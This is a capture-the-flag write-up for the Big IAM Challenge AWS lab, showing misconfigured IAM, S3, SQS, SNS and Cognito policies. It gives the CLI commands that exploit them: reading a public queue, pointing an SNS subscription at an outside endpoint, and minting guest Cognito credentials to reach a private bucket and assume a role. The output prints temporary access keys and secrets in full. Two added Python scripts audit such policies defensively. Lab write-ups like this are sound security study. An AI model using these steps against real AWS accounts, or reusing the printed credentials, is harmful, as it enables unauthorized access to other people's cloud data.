Lab address: The BIG IAM Challenge
challenge1

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}
```

challenge2
The hint given is:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}
```
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
Just view the message.
Visit the URL in it to get the flag.
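
Both policies above grant access to `"Principal": "*"`. The following check is an added example, not part of the original write-up: it flags Allow statements that any caller can use. The list of caller-restricting condition keys is a heuristic chosen for this example and is not exhaustive.

```python
# Added example: flag resource-policy statements that any AWS caller can use.
CALLER_KEYS = {  # condition keys that restrict WHO calls (heuristic, not exhaustive)
    "aws:principalarn", "aws:principalaccount", "aws:principalorgid",
    "aws:sourcearn", "aws:sourceaccount", "aws:sourceip",
    "aws:sourcevpc", "aws:sourcevpce",
}

def as_list(value):
    return value if isinstance(value, list) else [value]

def is_public(principal):
    """True for "*" and for {"AWS": "*"}-style principals."""
    if isinstance(principal, dict):
        return any("*" in as_list(v) for v in principal.values())
    return principal == "*"

def public_statements(policy):
    """Return (actions, resource) for Allow statements open to every caller."""
    findings = []
    for stmt in as_list(policy["Statement"]):
        if stmt.get("Effect") != "Allow" or not is_public(stmt.get("Principal")):
            continue
        keys = {k.lower() for op in stmt.get("Condition", {}).values() for k in op}
        if not keys & CALLER_KEYS:  # s3:prefix limits the request, not the caller
            findings.append((as_list(stmt["Action"]), stmt["Resource"]))
    return findings

BUCKET = "arn:aws:s3:::thebigiamchallenge-storage-9979f4b"
S3_POLICY = {"Version": "2012-10-17", "Statement": [  # challenge1 policy
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": BUCKET + "/*"},
    {"Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket",
     "Resource": BUCKET,
     "Condition": {"StringLike": {"s3:prefix": "files/*"}}},
]}
SQS_POLICY = {"Version": "2012-10-17", "Statement": [  # challenge2 policy
    {"Effect": "Allow", "Principal": "*",
     "Action": ["sqs:SendMessage", "sqs:ReceiveMessage"],
     "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"},
]}

if __name__ == "__main__":
    for name, policy in (("s3", S3_POLICY), ("sqs", SQS_POLICY)):
        for actions, resource in public_statements(policy):
            print(f"{name}: {actions} on {resource} is open to any caller")
```

The `s3:prefix` condition in challenge1 still produces a finding because it narrows which keys can be listed, not who may list them.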
challenge3
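This one is a subscription. We just need to pick a site that can receive out-of-band data: send a subscription request first, a URL then comes back in reply, and opening it confirms the subscription.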
> aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint yourUrl

challenge5
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}
```

```
> aws cognito-identity get-id --identity-pool-id 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b'
{
    "IdentityId": "us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb"
}
> aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb
{
    "IdentityId": "us-east-1:157d6171-eef3-c748-8cda-447ccf1953cb",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXM5KA3RD6",
        "SecretKey": "1Ot5T4CRqTtZyrY7w2Cf88WCMjjON0qyW5DuY/Iq",
        "SessionToken": "<session token omitted>",
        "Expiration": 1746445198.0
    }
}
❯ aws configure set aws_access_key_id ASIARK7LBOHXM5KA3RD6
❯ aws configure set aws_secret_access_key 1Ot5T4CRqTtZyrY7w2Cf88WCMjjON0qyW5DuY/Iq
❯ aws configure set aws_session_token <session token omitted>
❯ aws sts get-caller-identity
❯ aws s3 ls s3://wiz-privatefiles
```

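Remember to go through a proxy. The CLI built into the lab doesn't seem to work for this and can't be changed, so I suggest installing the AWS CLI locally.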
challenge6
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}
```
```
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb"
}
aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb
{
    "IdentityId": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb",
    "Token": "<OpenID token omitted>"
}
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name 11a --web-identity-token <OpenID token omitted>
{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXDSRNDLUP",
        "SecretAccessKey": "fVOOJB89RtKfaMR1SLUNtH08ZcdZtWflTTaCx7Pg",
        "SessionToken": "<session token omitted>",
        "Expiration": "2025-05-05T14:21:44+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:157d6171-eeb8-c7de-a1ea-32bd37977adb",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:11a",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/11a"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
```
Then configure the key ID, key and token the same way as in the previous level.
Passed! I'm still a bit lost on cloud security, so I'll keep reading~
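
The challenge6 trust policy pins `aud` to the identity pool but sets no condition on `cognito-identity.amazonaws.com:amr`, which is why a token obtained without logging in was accepted. The audit below is an added example, not part of the original write-up; the function names and the `HARDENED` policy are this example's own.

```python
# Added example: audit an IAM role trust policy that trusts Cognito identities.
COGNITO = "cognito-identity.amazonaws.com"

def condition_values(stmt, key):
    """Values required for `key` by positive operators (names without 'Not')."""
    values = []
    for operator, operands in stmt.get("Condition", {}).items():
        if "Not" in operator:
            continue
        for name, value in operands.items():
            if name.lower() == key:
                values += value if isinstance(value, list) else [value]
    return values

def audit_cognito_trust(policy):
    """Return findings for Allow statements that trust Cognito identities."""
    findings = []
    for stmt in policy["Statement"]:
        principal = stmt.get("Principal")
        federated = principal.get("Federated") if isinstance(principal, dict) else None
        if stmt.get("Effect") != "Allow" or federated != COGNITO:
            continue
        if not condition_values(stmt, COGNITO + ":aud"):
            findings.append("aud not pinned: tokens from any identity pool are accepted")
        if "authenticated" not in condition_values(stmt, COGNITO + ":amr"):
            findings.append("amr not required: guest identities can assume the role")
    return findings

POOL = "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"  # pool id from the page

def trust_policy(conditions):
    """Build a Cognito trust policy with the given Condition block."""
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Principal": {"Federated": COGNITO},
        "Action": "sts:AssumeRoleWithWebIdentity", "Condition": conditions}]}

# The challenge6 trust policy as shown on the page.
PAGE_POLICY = trust_policy({"StringEquals": {COGNITO + ":aud": POOL}})
# The same policy with the amr condition added (this example's hardened form).
HARDENED = trust_policy({
    "StringEquals": {COGNITO + ":aud": POOL},
    "ForAnyValue:StringLike": {COGNITO + ":amr": "authenticated"}})

if __name__ == "__main__":
    print("page policy:", audit_cognito_trust(PAGE_POLICY))
    print("hardened:   ", audit_cognito_trust(HARDENED))
```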

Addendum
You can also skip that method: set up a temporary profile file and specify it when making the call.
proxychains aws sts get-caller-identity --profile <profile>
